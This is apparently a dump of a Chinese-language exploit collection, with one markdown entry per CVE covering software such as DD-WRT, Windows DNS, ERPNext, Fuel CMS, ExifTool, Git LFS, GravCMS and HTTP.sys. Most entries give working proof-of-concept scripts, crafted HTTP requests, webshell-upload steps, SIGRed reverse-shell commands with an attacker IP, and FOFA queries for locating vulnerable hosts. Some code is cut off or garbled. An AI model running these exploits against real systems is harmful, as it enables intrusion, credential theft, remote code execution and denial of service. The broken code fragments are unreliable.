22 | 'HOST:239.255.255.250:1900\r\n' \
23 | 'ST:uuid:'+payload+'\r\n' \
24 | 'MX:2\r\n' \
25 | 'MAN:"ssdp:discover"\r\n' \
26 | '\r\n'
27 |
28 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
29 | s.sendto(packet.encode(), (target_ip, 1900) )
30 | ```
31 |
32 | ref:
33 |
34 | https://ssd-disclosure.com/ssd-advisory-dd-wrt-upnp-buffer-overflow/
--------------------------------------------------------------------------------
/DNS Server远程代码执行漏洞(CVE-2020-1350).md:
--------------------------------------------------------------------------------
1 | # DNS Server远程代码执行漏洞(CVE-2020-1350)
2 |
3 | 关于此漏洞的详细信息:https://www.graplsecurity.com/post/anatomy-of-an-exploit-rce-with-cve-2020-1350-sigred
4 |
5 | 漏洞利用:
6 |
7 | ```bash
8 | sudo python3 configure.py -ip IP_ATTACKER -p PORT_REVERSE_SHELL -hp PORT_APACHE_SERVER (default 80)
9 | sudo python3 evildns.py
10 | ```
11 |
12 | 需要sudo监听UDP和TCP端口53
13 |
14 | 然后运行:
15 |
16 | ```bash
17 | python3 exploit.py -ip WINDNS_VICTIM_IP -d EVIL_DOMAIN
18 | ```
19 |
20 | 设置反弹shell的监听:
21 |
22 | ```bash
23 | python3 reverse_shell/server.py -p PORT_REVERSE_SHELL
24 | ```
25 |
26 | poc:https://github.com/chompie1337/SIGRed_RCE_PoC
27 |
28 | ref:
29 |
30 | * https://www.graplsecurity.com/po ... ve-2020-1350-sigred
31 | * https://github.com/chompie1337/SIGRed_RCE_PoC
32 | * https://nvd.nist.gov/vuln/detail/CVE-2020-1350
--------------------------------------------------------------------------------
/Dell BIOS驱动权限提升漏洞(CVE-2021-21551).md:
--------------------------------------------------------------------------------
1 | # Dell BIOS驱动权限提升漏洞(CVE-2021-21551)
2 |
3 |
4 | 在Dell 的BIOS驱动中由于固件更新程序接受IOCTL(输入输出控制)请求,而没有ACL(访问控制列表),即可以被任意用户调用,通过此方法,造成了任意读取/写入漏洞,如果任意读写可以将当前用户提升至更高权限。
5 |
6 | PoC:https://github.com/waldo-irc/CVE-2021-21551
7 |
8 | Metasploit Exploit:https://github.com/rapid7/metasploit-framework/pull/15190
9 |
10 | https://github.com/zeroSteiner/metasploit-framework/blob/feat/cve-2021-21551/modules/exploits/windows/local/cve_2021_21551_dbutil_memmove.rb
11 |
12 |
13 | ```
14 | use exploit/windows/local/cve_2021_21551_dbutil_memmove
15 | 设置SESSION和PAYLOAD
16 | run
17 | ```
18 |
19 | ref:
20 |
21 | * https://github.com/rapid7/metasploit-framework/pull/15190
22 | * https://nvd.nist.gov/vuln/detail/CVE-2021-21551
23 | * https://github.com/waldo-irc/CVE-2021-21551
--------------------------------------------------------------------------------
/Dell OpenManage Server Administrator 任意文件读取 (CVE-2021-21514).md:
--------------------------------------------------------------------------------
1 | # Dell OpenManage Server Administrator 任意文件读取 (CVE-2021-21514)
2 |
3 | 此漏洞利用已知的身份验证绕过来获取OMSA的Web管理界面有效会话cookie。攻击者可以构造请求从服务器读取任意文件。CVE-2021-21514为CVE-2020-5377的补丁绕过。
4 |
5 | 影响版本:Dell OpenManage Server Administrator < 9.5
6 |
7 | 通过URL编码绕过DownloadServlet方法:
8 |
9 | ```
10 | https://omsa.server/{VID}/DownloadServle%74?help=Certificate&app=oma&vid={VID}&file=C:\some\file
11 | https://omsa.server/{VID}/DownloadServlet?help=Certificate&app=oma&vid={VID}&file=C:\some\file
12 | ```
13 |
14 | %74为t编码后的URL。
15 |
16 | 使用:
17 |
18 | CVE-2020-5377.py :
19 |
20 |
21 | poc.py:https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2020-5377_CVE-2021-21514
22 |
23 |
--------------------------------------------------------------------------------
/Docker 容器逃逸漏洞(CVE-2020-15257).md:
--------------------------------------------------------------------------------
1 | # Docker 容器逃逸漏洞(CVE-2020-15257)
2 |
3 | 漏洞原理、基础知识请阅读以下链接,不再展开:
4 |
5 | https://medium.com/nttlabs/dont-use-host-network-namespace-f548aeeef575
6 |
7 | 或者中文的:
8 |
9 | https://mp.weixin.qq.com/s/iNziquZJxcox9453jF8LOg
10 |
11 | 简要来说,containerd->containerd-shim->runc 的通信模型中,containerd-shim的接口作为abstract unix socket暴露,在docker使用net=host参数启动、与宿主机共享net namespace时,其中的unix socket可以被容器内部访问到,容器中攻击者通过该socket可以通过API控制下游runc进程启动新的恶意镜像,并通过该镜像逃逸。
12 |
13 | **POC**
14 |
15 | 这个漏洞POC比较简单,只要探测到docker内部有containerd-shim启动的unix socket即可确认。
16 |
17 | https://github.com/summershrimp/exploits-open/tree/9f2e0a28ffcf04ac81ce9113b2f8c451c36fe129/CVE-2020-15257
18 |
19 | https://github.com/Xyntax/CDK/releases/tag/0.1.6
20 |
21 | 
22 |
23 | 来源:https://www.cdxy.me/?p=837
24 |
--------------------------------------------------------------------------------
/ERPNext 13.0.0-12.18.0 中的SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # ERPNext 13.0.0/12.18.0 中的SQL注入漏洞
2 |
3 |
4 | Trovent Security GmbH 在“frappe.model.db_query.get_list”API参数中发现了一个SQL注入漏洞。在13.0.0版本上,不需要任何特权的Payload就足够了,但是在12.18.0版本上,至少需要“system_user”特权。易受攻击的参数“filters”允许注入SQL语句。攻击者能够查询所有可用的数据库表,以检索用户名,密码哈希或密码重置令牌,然后可以使用这些密码来重置管理员密码。
5 |
6 | poc:
7 |
8 | ```
9 | GET /api/method/frappe.model.db_query.get_list?filters=%7b%22name%20UNION%20SELECT%20password%20from%20%60__Auth%60%20--%20%22%3a
10 | %20%22administrator%22%7d&fields=%5b%22name%22%5d&doctype=User&limit=20'%3b%20do%20sleep(10)&order_by=name&_=1615372773071 HTTP/1.1
11 | Host: erpnext.local
12 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
13 | Accept: application/json
14 | Accept-Language: en-US,en;q=0.5
15 | Accept-Encoding: gzip, deflate
16 | X-Frappe-CSRF-Token: 0e89c5c43898da856fe12e19a57991d7bdf380477d0354f93ce6bcf3
17 | X-Frappe-CMD:
18 | X-Frappe-Doctype: Dashboard%20Settings
19 | X-Requested-With: XMLHttpRequest
20 | Connection: close
21 | Referer: http://erpnext.local/app/website
22 | Cookie: io=NVosyhHCvV3KdkxNAAi7; sid=26f7ddefef642c0f88b9babfc26b751229c32b565304f30815d8ec22; system_user=no; full_name=auth%20test%27; user_id=auth%40trovent.io; user_image=
23 | ```
24 |
25 | ref:
26 |
27 | 1. https://trovent.io/security-advisory-2103-01
28 | 2. https://seclists.org/oss-sec/2021/q2/121
29 |
--------------------------------------------------------------------------------
/Eclipse Jetty 拒绝服务 (CVE-2020-27223).md:
--------------------------------------------------------------------------------
1 | # Eclipse Jetty 拒绝服务 (CVE-2020-27223)
2 |
3 | 当Jetty处理包含带有大量质量因子参数(Accept请求头中的q值)的Accept请求头的请求时,CPU使用率较高,服务器可能会进入拒绝服务状态。
4 |
5 | 受影响版本:
6 |
7 | * · Eclipse Jetty 9.4.6.v20170531 至9.4.36.v20210114版本
8 | * · Eclipse Jetty 10.0.0版本
9 | * · Eclipse Jetty 11.0.0版本
10 |
11 | cve-2020-27223-poc1.sh: https://github.com/motikan2010/CVE-2020-27223/blob/main/poc/cve-2020-27223-poc1.sh
12 |
13 | cve-2020-27223-poc2.sh: https://github.com/motikan2010/CVE-2020-27223/blob/main/poc/cve-2020-27223-poc2.sh
14 |
15 |
16 | ```bash
17 | $ ./poc/cve-2020-27223-poc2.sh
18 | curl: (28) Operation timed out after 120000 milliseconds with 0 bytes received
19 |
20 | real 2m0.025s
21 | user 0m0.016s
22 | sys 0m0.009s
23 | ```
24 |
25 | ref:
26 |
27 | * https://github.com/eclipse/jetty.project/security/advisories/GHSA-m394-8rww-3jr7
28 | * https://github.com/motikan2010/CVE-2020-27223
--------------------------------------------------------------------------------
/Eclipse Theia < 0.16.0 Javascript注入 (CVE-2021-28162).md:
--------------------------------------------------------------------------------
1 | # Eclipse Theia < 0.16.0 Javascript注入 (CVE-2021-28162)
2 |
3 |
4 | 在Eclipse Theia 0.16.0含以下的版本中,通知消息中没有HTML转义,可以运行Javascript代码,导致Javascript注入。
5 |
6 | ```
7 | packages/messages/src/browser/notification-component.tsx:76
8 |
9 | ```
10 |
11 | 复现步骤:
12 |
13 | * 1.创建一个新项目并创建一个新的调试器配置文件 launch.json
14 | * 2.在type字段中编写Javascript Payload(例如)
15 | * 3.启动调试
16 |
17 | 复现视频:https://github.com/eclipse-theia/theia/files/4293788/Theia_PoC.zip
18 |
19 | ref:
20 |
21 | * https://nvd.nist.gov/vuln/detail/CVE-2021-28162
22 | * https://github.com/eclipse-theia/theia/issues/7283
--------------------------------------------------------------------------------
/Emlog v5.3.1 - v6.0.0 后台 RCE(CVE-2021-31737).md:
--------------------------------------------------------------------------------
1 | # Emlog v5.3.1 - v6.0.0 后台 RCE(CVE-2021-31737)
2 |
3 | 由于在admin/data.php中上传了数据库备份文件,因此emlog v5.3.1和emlog v6.0.0具有远程执行代码漏洞。
4 |
5 | 影响版本:
6 |
7 | * Emlog v5.3.1
8 | * Emlog v6.0.0
9 |
10 | PoC:
11 |
12 | ```
13 | select "" into outfile "/var/www/html/tet1/emlog_6.0.0/src/content/uploadfile/202104/222.php";
14 |
15 | ```
16 |
17 | 通过在后台数据-备份数据库进行构造恶意sql语句进行备份上传-getshell
18 |
19 | ref:
20 |
21 | * https://nvd.nist.gov/vuln/detail/CVE-2021-31737
22 | * https://github.com/emlog/emlog/issues/82
23 |
--------------------------------------------------------------------------------
/Emlog v6.0.0 ZIP插件GETSHELL(CVE-2020-21585).md:
--------------------------------------------------------------------------------
1 | # Emlog v6.0.0 ZIP插件GETSHELL(CVE-2020-21585)
2 |
3 | emlog v6.0.0中的漏洞允许用户通过zip插件模块上传webshell。
4 |
5 | **PoC:**
6 |
7 | ```
8 | http://x.x.x.x/emlog/src/admin/plugin.php
9 | 编辑一个ZIP包,包含xx/xx.php
10 | 访问之:http://127.0.0.1/emlog/src/content/plugins/abc/abc.php
11 | ```
12 |
13 | ref:
14 |
15 | * https://nvd.nist.gov/vuln/detail/CVE-2020-21585
16 | * https://github.com/pwnninja/emlog/issues/1
--------------------------------------------------------------------------------
/ExifTool 任意代码执行漏洞 (CVE-2021-22204).md:
--------------------------------------------------------------------------------
1 | # ExifTool 任意代码执行漏洞 (CVE-2021-22204)
2 |
3 |
4 | ExifTool 7.44及更高版本中,对DjVu文件格式中的用户数据进行不正确的中和,允许在解析恶意图像时执行任意代码。
5 |
6 | Metasploit module:https://github.com/rapid7/metasploit-framework/pull/15185
7 |
8 | poc:
9 |
10 | ```
11 | $ printf 'P1 1 1 0' > moo.pbm
12 | $ cjb2 moo.pbm moo.djvu
13 | $ printf 'ANTa\0\0\0\40"(xmp(\\\n".qx(cowsay pwned>&2);#"' >> moo.djvu
14 | $ exiftool moo.djvu > /dev/null
15 | _______
16 | < pwned >
17 | -------
18 | \ ^__^
19 | \ (oo)\_______
20 | (__)\ )\/\
21 | ||----w |
22 | || ||
23 | ```
24 |
25 | ref:
26 |
27 | * https://nvd.nist.gov/vuln/detail/CVE-2021-22204
28 | * https://twitter.com/wcbowling/status/1385803927321415687
29 | * https://www.openwall.com/lists/oss-security/2021/05/10/5
30 | * https://github.com/se162xg/CVE-2021-22204
--------------------------------------------------------------------------------
/FastAdmin 框架远程代码执行漏洞.md:
--------------------------------------------------------------------------------
1 | # FastAdmin 框架远程代码执行漏洞
2 |
3 |
4 | FastAdmin是一款基于ThinkPHP和Bootstrap的极速后台开发框架。FastAdmin框架存在有条件RCE漏洞,当攻击者具有一定用户权限的前提下,可以实现任意文件上传,导致RCE。
5 |
6 | FOFA:
7 |
8 | ```
9 | app="FASTADMIN-框架" || body="\"uploadurl\":\"ajax\/upload\"" || body="api.fastadmin.net" || body="\"fastadmin\":{\"usercenter\":true" || body="content=\"FastAdmin\"" || body="cdnurl\":\"\",\"version"|| icon_hash="-1036943727"
10 | ```
11 |
12 | 详细分析可以见:https://mp.weixin.qq.com/s/otrH75ZjCHBQbRB7g5DdWg
13 |
14 | 条件:
15 |
16 | * 普通用户
17 | * chunking = true (开启分片上传功能)
18 |
19 | 上传头像处post:
20 |
21 | ```
22 | //传入xx.php
23 | POST /index/ajax/upload HTTP/1.1
24 | Host: target
25 |
26 | ------WebKitFormBoundarybw5c2a2bqlLLOMEU
27 | Content-Disposition: form-data; name="file"; filename="Xnip2021-04-02_11-05-27.png"
28 | Content-Type: application/octet-stream
29 |
30 | PNG
31 | ...
32 |
33 | ------WebKitFormBoundarybw5c2a2bqlLLOMEU
34 | Content-Disposition: form-data; name="chunkid"
35 |
36 | xx.php
37 |
38 | ------WebKitFormBoundarybw5c2a2bqlLLOMEU
39 | Content-Disposition: form-data; name="chunkindex"
40 |
41 | 0
42 | ------WebKitFormBoundarybw5c2a2bqlLLOMEU
43 | ```
44 |
45 | 
46 |
47 |
48 | ref:
49 |
50 | * https://mp.weixin.qq.com/s/otrH75ZjCHBQbRB7g5DdWg
51 | * https://mp.weixin.qq.com/s/XP9t0TkObawMTSb41Z13gw
52 | * https://nosec.org/home/detail/4713.html
53 | * https://forum.ywhack.com/thread-115352-1-6.html
--------------------------------------------------------------------------------
/FortiLogger-未经身份验证的任意文件上传(CVE-2021-3378).md:
--------------------------------------------------------------------------------
1 | # FortiLogger-未经身份验证的任意文件上传(CVE-2021-3378)
2 |
3 | FortiLogger是一个基于Web的日志记录和报告软件,专门为在Windows操作系统上运行的FortiGate防火墙而设计。它包含即时状态跟踪,日志记录,搜索/过滤,报告和热点等功能。
4 |
5 | 在“热点设置” 下上传公司徽标时发现了此漏洞http://:5000/config/hotspotsettings)。可以向匿名用户发送没有任何身份验证或会话标头的文件,但POST要求是/Config/SaveUploadedHotspotLogoFile。
6 |
7 | 文件在C:\Program Files\RZK\Fortilogger\Web\Assets\temp\hotspot\img目标logohotspot名称下上传,而没有控制文件扩展名或内容。
8 |
9 | 漏洞详情:https://erberkan.github.io/2021/cve-2021-3378/
10 |
11 | msf exploit:https://github.com/erberkan/fortilogger_arbitrary_fileupload
12 |
13 | 另外的两个漏洞,信息泄露和无需任何授权即可创建用户,利用脚本可在https://erberkan.github.io/2021/cve-2021-3378/找到。
14 |
15 |
--------------------------------------------------------------------------------
/Fuel CMS 1.4.1 远程代码执行.md:
--------------------------------------------------------------------------------
1 | # Fuel CMS 1.4.1 远程代码执行
2 |
3 | FOFA:
4 |
5 | ```
6 | "Fuel CMS"
7 | ```
8 |
9 | PoC:
10 |
11 | ```bash
12 | /fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'
13 | ```
14 |
15 | ```ruby
16 | #!/usr/bin/env ruby
17 |
18 | require 'httpclient'
19 | require 'docopt'
20 |
21 | # dirty workaround to ignore Max-Age
22 | # https://github.com/nahi/httpclient/issues/242#issuecomment-69013932
23 | $VERBOSE = nil
24 |
25 | doc = <<~DOCOPT
26 | Fuel CMS 1.4 - Remote Code Execution
27 |
28 | Usage:
29 | #{__FILE__}
30 | #{__FILE__} -h | --help
31 |
32 | Options:
33 | Root URL (base path) including HTTP scheme, port and root folder
34 | The system command to execute
35 | -h, --help Show this screen
36 |
37 | Examples:
38 | #{__FILE__} http://example.org id
39 | #{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd'
40 | DOCOPT
41 |
42 | def exploit(client, root_url, cmd)
43 | url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'"
44 |
45 | res = client.get(url)
46 |
47 | /system(.+?)'], args['
'])
54 | rescue Docopt::Exit => e
55 | puts e.message
56 | end
57 |
58 | ```
59 |
60 | ref:
61 |
62 | * https://github.com/nahi/httpclient/issues/242
63 | * https://www.exploit-db.com/exploits/49487
--------------------------------------------------------------------------------
/Git CLI远程代码执行漏洞(CVE-2020-26233).md:
--------------------------------------------------------------------------------
1 | # Git CLI远程代码执行漏洞(CVE-2020-26233)
2 |
3 | src/shared/Microsoft.Git.CredentialManager/CommandContext.cs的代码:
4 |
5 | 
6 |
7 | 第89行中,将创建一个搜索git.exe的新进程,并将Environment.LocateExecutable('git.exe')作为目录路径参数传递给GitProcess()函数。
8 |
9 | **利用步骤:**
10 |
11 | * a)创建一个新的存储库或将文件添加到现有存储库;
12 | * b)将Windows可执行文件上传到此存储库,重命名为git.exe;
13 | * c)等待受害者fork存储库
14 |
15 | 
16 |
17 |
18 | 使用gh repo fork REPOSITORY_NAME --clone frok后触发rce:
19 |
20 |
21 | 
22 |
23 |
24 | ref:
25 |
26 | * https://github.com/microsoft/Git-Credential-Manager-Core/security/advisories/GHSA-2gq7-ww4j-3m76
27 | * https://wildfire.blazeinfosec.com/attack-of-the-clones-2-git-command-client-remote-code-execution-strikes-back/
28 | * https://github.com/microsoft/Git-Credential-Manager-Core/blob/c3a543a1352dba953e027f7a92ee4a94b2293a22/src/shared/Microsoft.Git.CredentialManager/CommandContext.cs#L89-L93
29 | * https://forum.ywhack.com/thread-115014-1-1.html
--------------------------------------------------------------------------------
/Git LFS 远程代码执行漏洞 CVE-2020–27955.md:
--------------------------------------------------------------------------------
1 | # Git LFS 远程代码执行漏洞 CVE-2020–27955
2 |
3 | 2020年11月5日,在Git扩展之一GIT LFS上发现了一个关键漏洞。此漏洞利用成功会导致目标机器的远程代码执行。
4 |
5 | 远程代码执行漏洞仅对Windows平台上的Git-LFS(git-lfs)版本<=2.12上有效。一旦受害者克隆了恶意存储库,并在他们的系统上运行了易受攻击版本的git-lfs,恶意Payload就会立即执行。
6 |
7 | 漏洞验证:
8 |
9 | 在CMD窗口上使用以下命令。如果安装了受影响的git-lfs工具,系统将提示您使用计算器应用程序。
10 |
11 |
12 | ```
13 | 1. mkdir C:\Windows\Temp\poc
14 | 2. cd C:\Windows\Temp\poc
15 | 3. echo calc.exe > git.cmd
16 | 4. git-lfs track
17 | ```
18 |
19 | 在目标系统上获得RCE
20 |
21 | 按照以下步骤进行远程代码执行
22 |
23 | 作为攻击者:
24 |
25 | 1.在GitHub上创建一个存储库
26 |
27 | 
28 |
29 |
30 |
31 | ```
32 | 2. cd /dev/shm
33 | 3. git clone https://github.com/attacker/poc.git .
34 | 4. echo calc.exe > git.cmd
35 | 5. git lfs track “*.dat”
36 | 6. echo “Junk” > large.dat
37 | 7. git add -A
38 | 8. git commit -m “POC”
39 | 9. git push -u origin master -f
40 | ```
41 |
42 | 
43 |
44 |
45 | 受害者:
46 |
47 | 1.git clone https://github.com/attacker/poc.git.
48 |
49 | 
50 |
51 | PoC视频:
52 |
53 | https://www.youtube.com/watch?v=WF69X9KEayE
54 |
55 | 加固建议:
56 |
57 | 更新并保持 git 版本高于 2.29.2,将 git-lfs 扩展程序保持在 2.12 以上
58 |
59 |
60 | ref:
61 |
62 | https://medium.com/bugbountywriteup/git-lfs-exploit-for-remote-code-execution-cve-2020-27955-e8f4786163c3
63 |
64 | https://forum.ywhack.com/thread-114744-1-4.html
--------------------------------------------------------------------------------
/GitLab Graphql 邮件地址信息泄露 (CVE-2020-26413).md:
--------------------------------------------------------------------------------
1 | # GitLab Graphql 邮件地址信息泄露 (CVE-2020-26413)
2 |
3 | GitLab中存在Graphql接口 输入构造的数据时会泄露用户邮箱和用户名
4 |
5 | 影响版本:
6 |
7 | GitLab 13.4 - 13.6.2
8 |
9 | 可以先通过接口进行遍历用户名,然后再枚举用户的邮箱...
10 |
11 |
12 | ```
13 | https://xxx/api/v4/users/x
14 | ```
15 |
16 | poc:
17 |
18 | ```
19 | http://xxx.xxx.xxx.xxx/-//graphql-explorer
20 | query {
21 | user(username:"root"){
22 | email
23 | username
24 | }
25 | }
26 | ```
27 |
28 | ref:
29 |
30 | * https://mp.weixin.qq.com/s/3cT8d9I7qru2tsURqUDusw
31 | * https://www.cnvd.org.cn/flaw/show/CNVD-2021-14193
32 | * https://nvd.nist.gov/vuln/detail/CVE-2020-26413
33 | * https://gitlab.com/gitlab-org/gitlab/-/issues/244275
--------------------------------------------------------------------------------
/Gitlab Kramdown RCE(CVE-2021-22192).md:
--------------------------------------------------------------------------------
1 | # Gitlab Kramdown RCE(CVE-2021-22192)
2 |
3 | chen师傅的分析:https://wx.zsxq.com/dweb2/index/group/555848225184
4 |
5 | 复现步骤可以见:https://hackerone.com/reports/1125425
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Gitlab SSRF-信息泄漏漏洞 (CVE-2021-22178-CVE-2021-22176).md:
--------------------------------------------------------------------------------
1 | # Gitlab SSRF/信息泄漏漏洞 (CVE-2021-22178/CVE-2021-22176)
2 |
3 | CVE-2021-22176
4 |
5 | GitLab 中存在一个信息泄露漏洞,不当的访问控制使降级的项目成员可以访问创作者的合并请求的详细信息。
6 |
7 | CVE-2021-22178
8 |
9 | 在GitLab中发现了一个问题,影响了从13.2开始的所有版本。Gitlab通过Prometheus集成容易受到SRRF攻击。
10 |
11 | 两个漏洞的PoC可以见:
12 |
13 | * CVE-2021-22176:https://gitlab.com/gitlab-org/gitlab/-/issues/243491
14 | * CVE-2021-22178:https://gitlab.com/gitlab-org/gitlab/-/issues/284819
15 |
16 | ref:
17 |
18 | * https://nvd.nist.gov/vuln/detail/CVE-2021-22176
19 | * https://nvd.nist.gov/vuln/detail/CVE-2021-22178
--------------------------------------------------------------------------------
/Gitlab 敏感信息泄露漏洞 (CVE-2021-22188).md:
--------------------------------------------------------------------------------
1 | # Gitlab 敏感信息泄露漏洞 (CVE-2021-22188)
2 |
3 | 通过该漏洞,未经授权的远程攻击者可以通过分支日志读取issue title
4 |
5 | 影响版本:
6 |
7 | GitLab >13.0
8 |
9 | 复现步骤:
10 |
11 |
12 | * 1.创建一个公共项目
13 | * 2.在此公共项目中创建一个机密问题
14 | * 3.在该公共项目中创建一个提交,并将提交消息设置为“Solves #”
15 | * 4.然后打开一个新的浏览器,使用非步骤1中创建项目的成员其它账户访问URL:
16 |
17 | ```
18 | http://host///-/refs//logs_tree/?format=json&offset=0
19 | ```
20 |
21 | ref:
22 |
23 | * https://nvd.nist.gov/vuln/detail/CVE-2021-22188
24 | * https://hackerone.com/reports/916340
--------------------------------------------------------------------------------
/GravCMS未经身份验证的任意YAML写入-RCE(CVE-2021-21425).md:
--------------------------------------------------------------------------------
1 | # GravCMS未经身份验证的任意YAML写入/RCE(CVE-2021-21425)
2 |
3 | 详情分析可以见:https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/
4 |
5 | 任意YAML文件写入:
6 |
7 | * 1 –访问hxxp://target/admin URL.。
8 | * 2 –获取cookie并从登录表单中提取admin-nonce值。
9 | * 3-执行以下POST请求。
10 |
11 |
12 | ```
13 | POST /admin/config/site HTTP/1.1
14 | HOST: target
15 | ...
16 |
17 | task=SavaDefault&data[title]=PWNED&admin-nonce=xxx
18 | ```
19 |
20 | rce:
21 |
22 | ```
23 | POST /admin/config/scheduler HTTP/1.1
24 | Host: 192.168.179.131
25 | Content-Length: 348
26 | Cache-Control: max-age=0
27 | Upgrade-Insecure-Requests: 1
28 | Origin: http://192.168.179.131
29 | Content-Type: application/x-www-form-urlencoded
30 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
31 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
32 | Referer: http://192.168.179.131/admin/forgot
33 | Accept-Encoding: gzip, deflate
34 | Accept-Language: en-US,en;q=0.9
35 | Cookie: grav-site-1dfbe94-admin=s2pca2cleqg78u8iit6v593h60
36 | Connection: close
37 | task=SaveDefault&data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Bcommand%5D=/usr/bin/echo
38 | &data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Bargs%5D=1337
39 | &data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Bat%5D=*+*+*+*+*
40 | &data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Boutput%5D=/tmp/1.txt
41 | &data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Boutput_mode%5D=append
42 | &admin-nonce=b78bb0a12604579896f9b4796dde8833
43 | ```
44 |
45 | ref:
46 |
47 | * https://nvd.nist.gov/vuln/detail/CVE-2021-21425
48 | * https://github.com/getgrav/grav-plugin-admin/security/advisories/GHSA-6f53-6qgv-39pj
49 | * https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/
--------------------------------------------------------------------------------
/H3C-SecPath-运维审计系统(堡垒机)任意用户登录.md:
--------------------------------------------------------------------------------
1 | # H3C-SecPath-运维审计系统(堡垒机)任意用户登录
2 |
3 | H3C SecPath 运维审计系统是基于用户现阶段面临的运维难题提出的一款运维风险管控产品。攻击者可通过输入特殊 url,达到任意用户登录的目的。
4 |
5 | FOFA:
6 |
7 | `app="H3C-SecPath-运维审计系统"`
8 |
9 | 影响版本:
10 | 2018
11 |
12 | PoC:
13 |
14 | ```
15 | http://target/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
16 | ```
17 |
18 | ref:
19 |
20 | https://nox.qianxin.com/vulnerability/detail/97202
--------------------------------------------------------------------------------
/HTTP协议栈远程代码执行漏洞(CVE-2021-31166).md:
--------------------------------------------------------------------------------
1 | # HTTP协议栈远程代码执行漏洞(CVE-2021-31166)
2 |
3 |
4 | 该漏洞存在于HTTP 协议栈 (http.sys) 的处理程序中,未经身份验证的远程攻击者可通过向目标主机发送特制数据包来进行利用,从而在目标系统上以内核身份执行任意代码。CVSS评分为9.8。
5 |
6 | 影响版本
7 |
8 | * Windows Server, version 20H2 (Server Core Installation)
9 | * Windows 10 Version 20H2 for ARM64-based Systems
10 | * Windows 10 Version 20H2 for 32-bit Systems
11 | * Windows 10 Version 20H2 for x64-based Systems
12 | * Windows Server, version 2004 (Server Core installation)
13 | * Windows 10 Version 2004 for x64-based Systems
14 | * Windows 10 Version 2004 for ARM64-based Systems
15 | * Windows 10 Version 2004 for 32-bit Systems
16 |
17 | PoC.py:
18 |
19 |
20 | ```
21 | import requests
22 | import argparse
23 |
24 | def main():
25 | parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')
26 | parser.add_argument('--target', required = True)
27 | args = parser.parse_args()
28 | r = requests.get(f'http://{args.target}/', headers = {
29 | 'Accept-Encoding': 'doar-e, ftw, imo, ,',
30 | })
31 | print(r)
32 |
33 | main()
34 | ```
35 |
36 | ref:
37 |
38 | * https://github.com/0vercl0k/CVE-2021-31166
39 | * http://blog.nsfocus.net/cve-2021-31166/
40 | * https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166
--------------------------------------------------------------------------------
/IBOS酷办公系统 后台命令执行.md:
--------------------------------------------------------------------------------
1 | # IBOS酷办公系统 后台命令执行
2 |
3 | FOFA:
4 |
5 | ```
6 | body="IBOS" && body="login-panel"
7 | ```
8 |
9 | 利用条件
10 |
11 | * IBOS_4.5.5及以前的版本
12 | * 需要具备后台登陆权限
13 |
14 | **PoC:**
15 |
16 | 登录之后点击管理后台。
17 |
18 | 在后台管理中找到通用设置,在数据库的备份中选择更多选项,数据备份方式选择系统 MySQL Dump (Shell) 备份,然后提交。
19 |
20 | 拦截此数据包,修改其中的filename参数,会在根目录生成2021.php
21 |
22 | ```
23 | 2021%26echo "">2021%PATHEXT:~0,1%php%262021
24 | ```
25 |
26 | via:xzuser@https://xz.aliyun.com/t/9115
--------------------------------------------------------------------------------
/IE 脚本引擎 jscript9.dll 内存损坏漏洞(CVE-2021-26419).md:
--------------------------------------------------------------------------------
1 | # IE 脚本引擎 jscript9.dll 内存损坏漏洞(CVE-2021-26419)
2 |
3 | IE 脚本引擎存在远程代码执行漏洞,攻击者可通过诱导用户打开特制网站来利用此漏洞,从而在目标设备上执行任意代码。
4 |
5 |
6 | poc见:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26419
7 |
8 |
--------------------------------------------------------------------------------
/Internet Explorer内存损坏漏洞(CVE-2021-26411).md:
--------------------------------------------------------------------------------
1 | # Internet Explorer内存损坏漏洞(CVE-2021-26411)
2 |
3 |
4 | Interne Explorer在处理DOM对象时,存在一处double free漏洞,攻击者可通过诱导用户点击恶意链接或文件来利用此漏洞,此漏洞可导致远程代码执行,从而使攻击者控制用户系统。该漏洞细节已公开,并检测到在野利用。
5 |
6 | 漏洞详情可以参考:https://iamelli0t.github.io/2021/03/12/CVE-2021-26411.html
7 |
8 | PoC:
9 |
10 |
11 | ```js
12 |
29 | ```
30 |
31 | ref:
32 |
33 | * https://msrc.microsoft.com/updat ... lity/CVE-2021-26411
34 | * https://nvd.nist.gov/vuln/detail/CVE-2021-26411
35 | * https://iamelli0t.github.io/2021/03/12/CVE-2021-26411.html
36 |
--------------------------------------------------------------------------------
/Ivanti Avalanche 目录遍历漏洞.md:
--------------------------------------------------------------------------------
1 | # Ivanti Avalanche 目录遍历漏洞
2 |
3 |
4 | Ivanti Avalanche是一种移动设备管理系统。Ivanti Avalanche中的一个漏洞允许未经身份验证的远程用户请求位于“ image”文件夹之外的文件。
5 |
6 | 影响版本:
7 |
8 | Windows v6.3.2.3490 的 Avalanche Premise 6.3.2
9 |
10 | PoC:
11 |
12 |
13 | ```
14 | 数据库读取:
